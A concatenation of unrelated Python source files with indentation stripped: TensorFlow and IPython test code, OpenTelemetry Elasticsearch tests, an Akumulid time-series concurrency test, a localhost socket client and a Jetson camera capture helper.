if not context.executing_eagerly():
self.skipTest("Skipping in graph mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["eager"])
def test_run_in_eager_and_graph_modes_skip_eager_runs_graph(self):
modes = []
def _test(self):
if context.executing_eagerly():
self.skipTest("Skipping in eager mode")
modes.append("eager" if context.executing_eagerly() else "graph")
test_util.run_in_graph_and_eager_modes(_test)(self)
self.assertEqual(modes, ["graph"])
@test_util.run_deprecated_v1
def test_run_in_graph_and_eager_modes_setup_in_same_mode(self):
modes = []
mode_name = lambda: "eager" if context.executing_eagerly() else "graph"
class ExampleTest(test_util.TensorFlowTestCase):
def runTest(self):
pass
def setUp(self):
modes.append("setup_" + mode_name())
@test_util.run_in_graph_and_eager_modes
def testBody(self):
modes.append("run_" + mode_name())
e = ExampleTest()
e.setUp()
e.testBody()
self.assertEqual(modes[0:2], ["setup_graph", "run_graph"])
self.assertEqual(modes[2:], ["setup_eager", "run_eager"])
@parameterized.named_parameters(dict(testcase_name="argument",
arg=True))
@test_util.run_in_graph_and_eager_modes
def test_run_in_graph_and_eager_works_with_parameterized_keyword(self, arg):
self.assertEqual(arg, True)
def test_build_as_function_and_v1_graph(self):
class GraphModeAndFuncionTest(parameterized.TestCase):
def __init__(inner_self): # pylint: disable=no-self-argument
super(GraphModeAndFuncionTest, inner_self).__init__()
inner_self.graph_mode_tested = False
inner_self.inside_function_tested = False
def runTest(self):
del self
@test_util.build_as_function_and_v1_graph
def test_modes(inner_self): # pylint: disable=no-self-argument
is_building_function = ops.get_default_graph().building_function
if is_building_function:
self.assertFalse(inner_self.inside_function_tested)
inner_self.inside_function_tested = True
else:
self.assertFalse(inner_self.graph_mode_tested)
inner_self.graph_mode_tested = True
test_object = GraphModeAndFuncionTest()
test_object.test_modes_v1_graph()
test_object.test_modes_function()
self.assertTrue(test_object.graph_mode_tested)
self.assertTrue(test_object.inside_function_tested)
def test_with_forward_compatibility_horizons(self):
tested_codepaths = set()
def some_function_with_forward_compat_behavior():
if compat.forward_compatible(2050, 1, 1):
tested_codepaths.add("future")
else:
tested_codepaths.add("present")
@test_util.with_forward_compatibility_horizons(None, [2051, 1, 1])
def some_test(self):
del self # unused
some_function_with_forward_compat_behavior()
some_test(None)
self.assertEqual(tested_codepaths, set(["present", "future"]))
# Its own test case to reproduce variable sharing issues which only pop up when
# setUp() is overridden and super() is not called.
class GraphAndEagerNoVariableSharing(test_util.TensorFlowTestCase):
def setUp(self):
pass # Intentionally does not call TensorFlowTestCase's super()
@test_util.run_in_graph_and_eager_modes
def test_no_variable_sharing(self):
variable_scope.get_variable(
name="step_size",
initializer=np.array(1e-5, np.float32),
use_resource=True,
trainable=False)
class GarbageCollectionTest(test_util.TensorFlowTestCase):
def test_no_reference_cycle_decorator(self):
class ReferenceCycleTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_garbage_created
def test_has_cycle(self):
a = []
a.append(a)
@test_util.assert_no_garbage_created
def test_has_no_cycle(self):
pass
with self.assertRaises(AssertionError):
ReferenceCycleTest().test_has_cycle()
ReferenceCycleTest().test_has_no_cycle()
@test_util.run_in_graph_and_eager_modes
def test_no_leaked_tensor_decorator(self):
class LeakedTensorTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
@test_util.assert_no_new_tensors
def test_has_leak(self):
self.a = constant_op.constant([3.], name="leak")
@test_util.assert_no_new_tensors
def test_has_no_leak(self):
constant_op.constant([3.], name="no-leak")
with self.assertRaisesRegexp(AssertionError, "Tensors not deallocated"):
LeakedTensorTest().test_has_leak()
LeakedTensorTest().test_has_no_leak()
def test_no_new_objects_decorator(self):
class LeakedObjectTest(object):
def __init__(inner_self): # pylint: disable=no-self-argument
inner_self.assertEqual = self.assertEqual # pylint: disable=invalid-name
inner_self.accumulation = []
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_leak(self):
self.accumulation.append([1.])
@test_util.assert_no_new_pyobjects_executing_eagerly
def test_has_no_leak(self):
self.not_accumulating = [1.]
with self.assertRaises(AssertionError):
LeakedObjectTest().test_has_leak()
LeakedObjectTest().test_has_no_leak()
if __name__ == "__main__":
googletest.main()
|
client.py | # -*- coding: utf-8 -*-
'''
Created on 2016年4月16日
@author: fly
'''
import threading
import time
import socket
def sendToServer(client):
time.sleep(4)
client.send('hello world.'.encode())
address = ('127.0.0.1', 31500)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(address)
i = 0
while i < 20:
t = threading.Thread(target=sendToServer, args=(s,))
t.start()
data = s.recv(512)
time.sleep(5)
print ('the data received is',data )
i += 1
s.send('hihi'.encode())
s.close() |
test_concurrency.py | from __future__ import print_function
import akumulid_test_tools as att
import datetime
import itertools
import json
import math
import multiprocessing
import os
import sys
import time
import traceback
try:
from urllib2 import urlopen, HTTPError
except ImportError:
from urllib import urlopen, HTTPError
HOST = '127.0.0.1'
TCPPORT = 8282
HTTPPORT = 8181
"""
Test plan:
Process 1 (reader).
- Start process 2 (writer).
- Read all data in fwd direction in range [begin, end-window].
Process 2 (writer).
- Write data in range [begin, mid] in a loop.
- Long pause.
- Write data in range (mid, end] in a loop.
- Exit.
"""
def writer(dt, delta, N):
try:
chan = att.TCPChan(HOST, TCPPORT)
# fill data in
print("Sending {0} messages through TCP...".format(N))
tags = {
"tag": ['Foo'],
}
print("Generating {0} messages...".format(N))
messages = att.generate_messages(dt, delta, N, 'test', **tags)
for it in messages:
chan.send(it)
print("{0} messages sent".format(N))
time.sleep(5)
except:
print("Exception in writer")
traceback.print_exc()
raise
def line2tup(seq):
for ix, line in enumerate(seq):
try:
columns = line.split(',')
tagline = columns[0].strip()
timestamp = att.parse_timestamp(columns[1].strip())
value = float(columns[2].strip())
yield tagline, timestamp, value
except:
print("Error in line: {0}".format(ix))
print(line)
raise
def require_continuous(seq, fn):
"""Checks that supplied sequence is ordered in a right way
and doesn't has any gaps.
Returns first and last elements.
"""
first = None
prev = None
for it in seq:
if first is None:
first = it
prev = it
continue
fn(it, prev)
prev = it
return first, prev
processed = 0
def reader(dtstart, delta, N):
# Start writer process
wproc = multiprocessing.Process(name='Writer', target=writer, args=[dtstart, delta, N])
wproc.start()
def cmp_tuples(lhs, rhs):
# ignore tags
timedelta = lhs[1] - rhs[1]
if timedelta != delta:
raise ValueError("Invalid timestamps, current {0}, previous {1}".format(lhs[1], rhs[1]))
valdelta = lhs[2] - rhs[2]
if valdelta - 1.0 > 0.000001:
raise ValueError("Invalid value, current {0}, previous {1}".format(lhs[2], rhs[2]))
try:
print("Test #1")
end = dtstart + delta*N
begin = dtstart
timedelta = end - begin
query_params = {"output": { "format": "csv" }}
http_err_cnt = 0
while True:
try:
query = att.makequery("test", begin, end, **query_params)
print("Query: {0}".format(query))
queryurl = "http://{0}:{1}/api/query".format(HOST, HTTPPORT)
response = urlopen(queryurl, json.dumps(query))
def count_lines(seq):
global processed
for msg in seq:
yield msg
processed += 1
tuples = line2tup(count_lines(response))
first, last = require_continuous(tuples, cmp_tuples)
print("First: {0}".format(first and first[1].strftime("%Y%m%dT%H%M%S.%f") or "None"))
print("Last : {0}".format( last and last[1].strftime("%Y%m%dT%H%M%S.%f") or "None"))
if last is not None:
begin = last[1]
if first[1] == (end - delta):
break
except HTTPError as err:
print("HTTP error: {0}".format(err))
http_err_cnt += 1
if http_err_cnt == 10:
raise
print("Test passed")
finally:
print("{0} messages processed".format(processed))
wproc.join()
def main(path, debug=False):
if not os.path.exists(path):
print("Path {0} doesn't exists".format(path))
sys.exit(1)
akumulid = att.Akumulid(path)
if not debug:
# Reset database
akumulid.delete_database()
akumulid.create_database()
# start ./akumulid server
print("Starting server...")
akumulid.serve()
time.sleep(5)
else:
print("Akumulid should be started first")
try:
dt = datetime.datetime.utcnow()
delta = datetime.timedelta(milliseconds=1)
nmsgs = 1000000
rproc = multiprocessing.Process(name='Reader', target=reader, args=[dt, delta, nmsgs])
rproc.start()
rproc.join()
except:
traceback.print_exc()
raise
finally:
if not debug:
print("Stopping server...")
akumulid.stop()
time.sleep(5)
if __name__ == '__main__':
print(' '.join(sys.argv))
if len(sys.argv) < 2:
print("Not enough arguments")
sys.exit(1)
main(sys.argv[1], sys.argv[2] == 'debug' if len(sys.argv) == 3 else False)
else:
raise ImportError("This module shouldn't be imported")
|
test_elasticsearch.py | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import os
import threading
from ast import literal_eval
from unittest import mock
import elasticsearch
import elasticsearch.exceptions
from elasticsearch import Elasticsearch
from elasticsearch_dsl import Search
import opentelemetry.instrumentation.elasticsearch
from opentelemetry import trace
from opentelemetry.instrumentation.elasticsearch import (
ElasticsearchInstrumentor,
)
from opentelemetry.semconv.trace import SpanAttributes
from opentelemetry.test.test_base import TestBase
from opentelemetry.trace import StatusCode
major_version = elasticsearch.VERSION[0]
if major_version == 7:
from . import helpers_es7 as helpers # pylint: disable=no-name-in-module
elif major_version == 6:
from . import helpers_es6 as helpers # pylint: disable=no-name-in-module
elif major_version == 5:
from . import helpers_es5 as helpers # pylint: disable=no-name-in-module
else:
from . import helpers_es2 as helpers # pylint: disable=no-name-in-module
Article = helpers.Article
@mock.patch(
"elasticsearch.connection.http_urllib3.Urllib3HttpConnection.perform_request"
)
class TestElasticsearchIntegration(TestBase):
def setUp(self):
super().setUp()
self.tracer = self.tracer_provider.get_tracer(__name__)
ElasticsearchInstrumentor().instrument()
def tearDown(self):
super().tearDown()
with self.disable_logging():
ElasticsearchInstrumentor().uninstrument()
def test_instrumentor(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
# Check version and name in span's instrumentation info
# self.assertEqualSpanInstrumentationInfo(span, opentelemetry.instrumentation.elasticsearch)
self.assertEqualSpanInstrumentationInfo(
span, opentelemetry.instrumentation.elasticsearch
)
# check that no spans are generated after uninstrument
ElasticsearchInstrumentor().uninstrument()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_finished_spans()
self.assertEqual(len(spans_list), 1)
def test_span_not_recording(self, request_mock):
request_mock.return_value = (1, {}, {})
mock_tracer = mock.Mock()
mock_span = mock.Mock()
mock_span.is_recording.return_value = False
mock_tracer.start_span.return_value = mock_span
with mock.patch("opentelemetry.trace.get_tracer") as tracer:
tracer.return_value = mock_tracer
Elasticsearch()
self.assertFalse(mock_span.is_recording())
self.assertTrue(mock_span.is_recording.called)
self.assertFalse(mock_span.set_attribute.called)
self.assertFalse(mock_span.set_status.called)
ElasticsearchInstrumentor().uninstrument()
def test_prefix_arg(self, request_mock):
prefix = "prefix-from-env"
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor(span_name_prefix=prefix).instrument()
request_mock.return_value = (1, {}, {})
self._test_prefix(prefix)
def test_prefix_env(self, request_mock):
prefix = "prefix-from-args"
env_var = "OTEL_PYTHON_ELASTICSEARCH_NAME_PREFIX"
os.environ[env_var] = prefix
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor().instrument()
request_mock.return_value = (1, {}, {})
del os.environ[env_var]
self._test_prefix(prefix)
def _test_prefix(self, prefix):
es = Elasticsearch()
es.index(index="sw", doc_type="people", id=1, body={"name": "adam"})
spans_list = self.get_finished_spans()
self.assertEqual(len(spans_list), 1)
span = spans_list[0]
self.assertTrue(span.name.startswith(prefix))
def test_result_values(self, request_mock):
request_mock.return_value = (
1,
{},
'{"found": false, "timed_out": true, "took": 7}',
)
es = Elasticsearch()
es.get(index="test-index", doc_type="tweet", id=1)
spans = self.get_finished_spans()
self.assertEqual(1, len(spans))
self.assertEqual("False", spans[0].attributes["elasticsearch.found"])
self.assertEqual(
"True", spans[0].attributes["elasticsearch.timed_out"]
)
self.assertEqual("7", spans[0].attributes["elasticsearch.took"])
def test_trace_error_unknown(self, request_mock):
exc = RuntimeError("custom error")
request_mock.side_effect = exc
self._test_trace_error(StatusCode.ERROR, exc)
def test_trace_error_not_found(self, request_mock):
msg = "record not found"
exc = elasticsearch.exceptions.NotFoundError(404, msg)
request_mock.return_value = (1, {}, {})
request_mock.side_effect = exc
self._test_trace_error(StatusCode.ERROR, exc)
def _test_trace_error(self, code, exc):
es = Elasticsearch()
try:
es.get(index="test-index", doc_type="tweet", id=1)
except Exception: # pylint: disable=broad-except
pass
spans = self.get_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
self.assertFalse(span.status.is_ok)
self.assertEqual(span.status.status_code, code)
self.assertEqual(
span.status.description, f"{type(exc).__name__}: {exc}"
)
def test_parent(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
with self.tracer.start_as_current_span("parent"):
es.index(
index="sw", doc_type="people", id=1, body={"name": "adam"}
)
spans = self.get_finished_spans()
self.assertEqual(len(spans), 2)
parent = spans.by_name("parent")
child = spans.by_name("Elasticsearch/sw/people/1")
self.assertIsNotNone(child.parent)
self.assertEqual(child.parent.span_id, parent.context.span_id)
def test_multithread(self, request_mock):
request_mock.return_value = (1, {}, {})
es = Elasticsearch()
ev = threading.Event()
# 1. Start tracing from thread-1; make thread-2 wait
# 2. Trace something from thread-2, make thread-1 join before finishing.
# 3. Check the spans got different parents, and are in the expected order.
def target1(parent_span):
with trace.use_span(parent_span):
es.get(index="test-index", doc_type="tweet", id=1)
ev.set()
ev.wait()
def target2():
ev.wait()
es.get(index="test-index", doc_type="tweet", id=2)
ev.set()
with self.tracer.start_as_current_span("parent") as span:
t1 = threading.Thread(target=target1, args=(span,))
t1.start()
t2 = threading.Thread(target=target2)
t2.start()
t1.join()
t2.join()
spans = self.get_finished_spans()
self.assertEqual(3, len(spans))
s1 = spans.by_name("parent")
s2 = spans.by_name("Elasticsearch/test-index/tweet/1")
s3 = spans.by_name("Elasticsearch/test-index/tweet/2")
self.assertIsNotNone(s2.parent)
self.assertEqual(s2.parent.span_id, s1.context.span_id)
self.assertIsNone(s3.parent)
def test_dsl_search(self, request_mock):
request_mock.return_value = (1, {}, '{"hits": {"hits": []}}')
client = Elasticsearch()
search = Search(using=client, index="test-index").filter(
"term", author="testing"
)
search.execute()
spans = self.get_finished_spans()
span = spans[0]
self.assertEqual(1, len(spans))
self.assertEqual(span.name, "Elasticsearch/test-index/_search")
self.assertIsNotNone(span.end_time)
self.assertEqual(
span.attributes,
{
SpanAttributes.DB_SYSTEM: "elasticsearch",
"elasticsearch.url": "/test-index/_search",
"elasticsearch.method": helpers.dsl_search_method,
SpanAttributes.DB_STATEMENT: str(
{
"query": {
"bool": {
"filter": [{"term": {"author": "testing"}}]
}
}
}
),
},
)
def test_dsl_create(self, request_mock):
request_mock.return_value = (1, {}, {})
client = Elasticsearch()
Article.init(using=client)
spans = self.get_finished_spans()
self.assertEqual(2, len(spans))
span1 = spans.by_attr(key="elasticsearch.method", value="HEAD")
span2 = spans.by_attr(key="elasticsearch.method", value="PUT")
self.assertEqual(
span1.attributes,
{
SpanAttributes.DB_SYSTEM: "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "HEAD",
},
)
attributes = {
SpanAttributes.DB_SYSTEM: "elasticsearch",
"elasticsearch.url": "/test-index",
"elasticsearch.method": "PUT",
}
self.assertSpanHasAttributes(span2, attributes)
self.assertEqual(
literal_eval(span2.attributes[SpanAttributes.DB_STATEMENT]),
helpers.dsl_create_statement,
)
def test_dsl_index(self, request_mock):
request_mock.return_value = helpers.dsl_index_result
client = Elasticsearch()
article = Article(
meta={"id": 2},
title="About searching",
body="A few words here, a few words there",
)
res = article.save(using=client)
self.assertTrue(res)
spans = self.get_finished_spans()
self.assertEqual(1, len(spans))
span = spans[0]
self.assertEqual(span.name, helpers.dsl_index_span_name)
attributes = {
SpanAttributes.DB_SYSTEM: "elasticsearch",
"elasticsearch.url": helpers.dsl_index_url,
"elasticsearch.method": "PUT",
}
self.assertSpanHasAttributes(span, attributes)
self.assertEqual(
literal_eval(span.attributes[SpanAttributes.DB_STATEMENT]),
{
"body": "A few words here, a few words there",
"title": "About searching",
},
)
def test_request_hook(self, request_mock):
request_hook_method_attribute = "request_hook.method"
request_hook_url_attribute = "request_hook.url"
request_hook_kwargs_attribute = "request_hook.kwargs"
def request_hook(span, method, url, kwargs):
attributes = {
request_hook_method_attribute: method,
request_hook_url_attribute: url,
request_hook_kwargs_attribute: json.dumps(kwargs),
}
if span and span.is_recording():
span.set_attributes(attributes)
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor().instrument(request_hook=request_hook)
request_mock.return_value = (
1,
{},
'{"found": false, "timed_out": true, "took": 7}',
)
es = Elasticsearch()
index = "test-index"
doc_type = "tweet"
doc_id = 1
kwargs = {"params": {"test": True}}
es.get(index=index, doc_type=doc_type, id=doc_id, **kwargs)
spans = self.get_finished_spans()
self.assertEqual(1, len(spans))
self.assertEqual(
"GET", spans[0].attributes[request_hook_method_attribute]
)
self.assertEqual(
f"/{index}/{doc_type}/{doc_id}",
spans[0].attributes[request_hook_url_attribute],
)
self.assertEqual(
json.dumps(kwargs),
spans[0].attributes[request_hook_kwargs_attribute],
)
def test_response_hook(self, request_mock):
response_attribute_name = "db.query_result"
def response_hook(span, response):
if span and span.is_recording():
span.set_attribute(
response_attribute_name, json.dumps(response)
)
ElasticsearchInstrumentor().uninstrument()
ElasticsearchInstrumentor().instrument(response_hook=response_hook)
response_payload = {
"took": 9,
"timed_out": False,
"_shards": {
"total": 1,
"successful": 1,
"skipped": 0,
"failed": 0,
},
"hits": {
"total": {"value": 1, "relation": "eq"},
"max_score": 0.18232156,
"hits": [
{
"_index": "test-index",
"_type": "tweet",
"_id": "1",
"_score": 0.18232156,
"_source": {"name": "tester"},
}
],
},
}
request_mock.return_value = (
1,
{},
json.dumps(response_payload),
)
es = Elasticsearch()
es.get(index="test-index", doc_type="tweet", id=1)
spans = self.get_finished_spans()
self.assertEqual(1, len(spans))
self.assertEqual(
json.dumps(response_payload),
spans[0].attributes[response_attribute_name],
)
|
camera.py | """camera.py
This code implements the Camera class, which encapsulates code to
handle IP CAM, USB webcam or the Jetson onboard camera. In
addition, this Camera class is further extended to take a video
file or an image file as input.
This file was modified from:
https://github.com/jkjung-avt/tensorrt_demos/blob/master/utils/camera.py
"""
import logging
import threading
import subprocess
import numpy as np
import cv2
# The following flag ise used to control whether to use a GStreamer
# pipeline to open USB webcam source. If set to False, we just open
# the webcam using cv2.VideoCapture(index) machinery. i.e. relying
# on cv2's built-in function to capture images from the webcam.
USB_GSTREAMER = True
def add_camera_args(parser):
"""Add parser augument for camera options."""
parser.add_argument('--file', dest='use_file',
help='use a video file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--image', dest='use_image',
help='use an image file as input (remember to '
'also set --filename)',
action='store_true')
parser.add_argument('--filename', dest='filename',
help='video file name, e.g. test.mp4',
default=None, type=str)
parser.add_argument('--rtsp', dest='use_rtsp',
help='use IP CAM (remember to also set --uri)',
action='store_true')
parser.add_argument('--uri', dest='rtsp_uri',
help='RTSP URI, e.g. rtsp://192.168.1.64:554',
default=None, type=str)
parser.add_argument('--latency', dest='rtsp_latency',
help='latency in ms for RTSP [200]',
default=200, type=int)
parser.add_argument('--usb', dest='use_usb',
help='use USB webcam (remember to also set --vid)',
action='store_true')
parser.add_argument('--vid', dest='video_dev',
help='device # of USB webcam (/dev/video?) [0]',
default=0, type=int)
parser.add_argument('--width', dest='image_width',
help='image width [640]',
default=640, type=int)
parser.add_argument('--height', dest='image_height',
help='image height [480]',
default=480, type=int)
return parser
def open_cam_rtsp(uri, width, height, latency):
"""Open an RTSP URI (IP CAM)."""
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'omxh264dec' in gst_elements:
# Use hardware H.264 decoder on Jetson platforms
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! omxh264dec ! '
'nvvidconv ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! videoconvert ! '
'appsink').format(uri, latency, width, height)
elif 'avdec_h264' in gst_elements:
# Otherwise try to use the software decoder 'avdec_h264'
# NOTE: in case resizing images is necessary, try adding
# a 'videoscale' into the pipeline
gst_str = ('rtspsrc location={} latency={} ! '
'rtph264depay ! h264parse ! avdec_h264 ! '
'videoconvert ! appsink').format(uri, latency)
else:
raise RuntimeError('H.264 decoder not found!')
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def open_cam_usb(dev, width, height):
"""Open a USB webcam."""
if USB_GSTREAMER:
gst_str = ('v4l2src device=/dev/video{} ! '
'video/x-raw, width=(int){}, height=(int){} ! '
'videoconvert ! appsink').format(dev, width, height)
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
else:
return cv2.VideoCapture(dev)
def open_cam_onboard(width, height):
"""Open the Jetson onboard camera."""
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvcamerasrc' in gst_elements:
# On versions of L4T prior to 28.1, you might need to add
# 'flip-method=2' into gst_str below.
gst_str = ('nvcamerasrc ! '
'video/x-raw(memory:NVMM), '
'width=(int)2592, height=(int)1458, '
'format=(string)I420, framerate=(fraction)30/1 ! '
'nvvidconv ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(width, height)
elif 'nvarguscamerasrc' in gst_elements:
gst_str = ('nvarguscamerasrc ! '
'video/x-raw(memory:NVMM), '
'width=(int)1920, height=(int)1080, '
'format=(string)NV12, framerate=(fraction)30/1 ! '
'nvvidconv flip-method=2 ! '
'video/x-raw, width=(int){}, height=(int){}, '
'format=(string)BGRx ! '
'videoconvert ! appsink').format(width, height)
else:
raise RuntimeError('onboard camera source not found!')
return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
def grab_img(cam):
"""This 'grab_img' function is designed to be run in the sub-thread.
Once started, this thread continues to grab a new image and put it
into the global 'img_handle', until 'thread_running' is set to False.
"""
while cam.thread_running:
_, cam.img_handle = cam.cap.read()
if cam.img_handle is None:
logging.warning('grab_img(): cap.read() returns None...')
break
cam.thread_running = False
class Camera():
"""Camera class which supports reading images from theses video sources:
1. Video file
2. Image (jpg, png, etc.) file, repeating indefinitely
3. RTSP (IP CAM)
4. USB webcam
5. Jetson onboard camera
"""
def __init__(self, args):
self.args = args
self.is_opened = False
self.use_thread = False
self.thread_running = False
self.img_handle = None
self.img_width = 0
self.img_height = 0
self.cap = None
self.thread = None
def open(self):
"""Open camera based on command line arguments."""
assert self.cap is None, 'Camera is already opened!'
args = self.args
if args.use_file:
self.cap = cv2.VideoCapture(args.filename)
# ignore image width/height settings here
self.use_thread = False
elif args.use_image:
self.cap = 'OK'
self.img_handle = cv2.imread(args.filename)
# ignore image width/height settings here
if self.img_handle is not None:
self.is_opened = True
self.img_height, self.img_width, _ = self.img_handle.shape
self.use_thread = False
elif args.use_rtsp:
self.cap = open_cam_rtsp(
args.rtsp_uri,
args.image_width,
args.image_height,
args.rtsp_latency
)
self.use_thread = True
elif args.use_usb:
self.cap = open_cam_usb(
args.video_dev,
args.image_width,
args.image_height
)
self.use_thread = True
else: # by default, use the jetson onboard camera
self.cap = open_cam_onboard(
args.image_width,
args.image_height
)
self.use_thread = True
if self.cap != 'OK':
if self.cap.isOpened():
# Try to grab the 1st image and determine width and height
_, img = self.cap.read()
if img is not None:
self.img_height, self.img_width, _ = img.shape
self.is_opened = True
def start(self):
assert not self.thread_running
if self.use_thread:
self.thread_running = True
self.thread = threading.Thread(target=grab_img, args=(self,))
self.thread.start()
def stop(self):
self.thread_running = False
if self.use_thread:
self.thread.join()
def read(self):
if self.args.use_file:
_, img = self.cap.read()
if img is None:
# looping around
self.cap.release()
self.cap = cv2.VideoCapture(self.args.filename)
_, img = self.cap.read()
return img
elif self.args.use_image:
return np.copy(self.img_handle)
else:
return self.img_handle
def release(self):
assert not self.thread_running
if self.cap != 'OK':
self.cap.release() |
test_kernel.py | # coding: utf-8
"""test the IPython Kernel"""
# Copyright (c) IPython Development Team.
# Distributed under the terms of the Modified BSD License.
import ast
import io
import os.path
import sys
import time
import nose.tools as nt
from flaky import flaky
from IPython.testing import decorators as dec, tools as tt
from ipython_genutils import py3compat
from IPython.paths import locate_profile
from ipython_genutils.tempdir import TemporaryDirectory
from .utils import (
new_kernel, kernel, TIMEOUT, assemble_output, execute,
flush_channels, wait_for_idle,
)
def _check_master(kc, expected=True, stream="stdout"):
execute(kc=kc, code="import sys")
flush_channels(kc)
msg_id, content = execute(kc=kc, code="print (sys.%s._is_master_process())" % stream)
stdout, stderr = assemble_output(kc.iopub_channel)
assert stdout.strip() == repr(expected)
def _check_status(content):
"""If status=error, show the traceback"""
if content['status'] == 'error':
assert False, ''.join(['\n'] + content['traceback'])
# printing tests
def test_simple_print():
"""simple print statement in kernel"""
with kernel() as kc:
iopub = kc.iopub_channel
msg_id, content = execute(kc=kc, code="print ('hi')")
stdout, stderr = assemble_output(iopub)
assert stdout == 'hi\n'
assert stderr == ''
_check_master(kc, expected=True)
def test_sys_path():
"""test that sys.path doesn't get messed up by default"""
with kernel() as kc:
msg_id, content = execute(kc=kc, code="import sys; print(repr(sys.path))")
stdout, stderr = assemble_output(kc.iopub_channel)
# for error-output on failure
sys.stderr.write(stderr)
sys_path = ast.literal_eval(stdout.strip())
assert '' in sys_path
def test_sys_path_profile_dir():
"""test that sys.path doesn't get messed up when `--profile-dir` is specified"""
with new_kernel(['--profile-dir', locate_profile('default')]) as kc:
msg_id, content = execute(kc=kc, code="import sys; print(repr(sys.path))")
stdout, stderr = assemble_output(kc.iopub_channel)
# for error-output on failure
sys.stderr.write(stderr)
sys_path = ast.literal_eval(stdout.strip())
assert '' in sys_path
@flaky(max_runs=3)
@dec.skipif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_print():
"""printing from forked mp.Process"""
with new_kernel() as kc:
iopub = kc.iopub_channel
_check_master(kc, expected=True)
flush_channels(kc)
np = 5
code = '\n'.join([
"from __future__ import print_function",
"import time",
"import multiprocessing as mp",
"pool = [mp.Process(target=print, args=('hello', i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()",
"time.sleep(0.5),"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
nt.assert_equal(stdout.count("hello"), np, stdout)
for n in range(np):
nt.assert_equal(stdout.count(str(n)), 1, stdout)
assert stderr == ''
_check_master(kc, expected=True)
_check_master(kc, expected=True, stream="stderr")
@flaky(max_runs=3)
def test_subprocess_noprint():
"""mp.Process without print doesn't trigger iostream mp_mode"""
with kernel() as kc:
iopub = kc.iopub_channel
np = 5
code = '\n'.join([
"import multiprocessing as mp",
"pool = [mp.Process(target=range, args=(i,)) for i in range(%i)]" % np,
"for p in pool: p.start()",
"for p in pool: p.join()"
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
assert stdout == ''
assert stderr == ''
_check_master(kc, expected=True)
_check_master(kc, expected=True, stream="stderr")
@flaky(max_runs=3)
@dec.skipif(sys.platform == 'win32', "subprocess prints fail on Windows")
def test_subprocess_error():
"""error in mp.Process doesn't crash"""
with new_kernel() as kc:
iopub = kc.iopub_channel
code = '\n'.join([
"import multiprocessing as mp",
"p = mp.Process(target=int, args=('hi',))",
"p.start()",
"p.join()",
])
msg_id, content = execute(kc=kc, code=code)
stdout, stderr = assemble_output(iopub)
assert stdout == ''
assert "ValueError" in stderr
_check_master(kc, expected=True)
_check_master(kc, expected=True, stream="stderr")
# raw_input tests
def test_raw_input():
"""test [raw_]input"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print({input_f}("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
assert msg['header']['msg_type'] == u'input_request'
content = msg['content']
assert content['prompt'] == theprompt
text = "some text"
kc.input(text)
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'ok'
stdout, stderr = assemble_output(iopub)
assert stdout == text + "\n"
@dec.skipif(py3compat.PY3)
def test_eval_input():
"""test input() on Python 2"""
with kernel() as kc:
iopub = kc.iopub_channel
input_f = "input" if py3compat.PY3 else "raw_input"
theprompt = "prompt> "
code = 'print(input("{theprompt}"))'.format(**locals())
msg_id = kc.execute(code, allow_stdin=True)
msg = kc.get_stdin_msg(block=True, timeout=TIMEOUT)
assert msg['header']['msg_type'] == u'input_request'
content = msg['content']
assert content['prompt'] == theprompt
kc.input("1+1")
reply = kc.get_shell_msg(block=True, timeout=TIMEOUT)
assert reply['content']['status'] == 'ok'
stdout, stderr = assemble_output(iopub)
assert stdout == "2\n"
def test_save_history():
# Saving history from the kernel with %hist -f was failing because of
# unicode problems on Python 2.
with kernel() as kc, TemporaryDirectory() as td:
file = os.path.join(td, 'hist.out')
execute(u'a=1', kc=kc)
wait_for_idle(kc)
execute(u'b=u"abcþ"', kc=kc)
wait_for_idle(kc)
_, reply = execute("%hist -f " + file, kc=kc)
assert reply['status'] == 'ok'
with io.open(file, encoding='utf-8') as f:
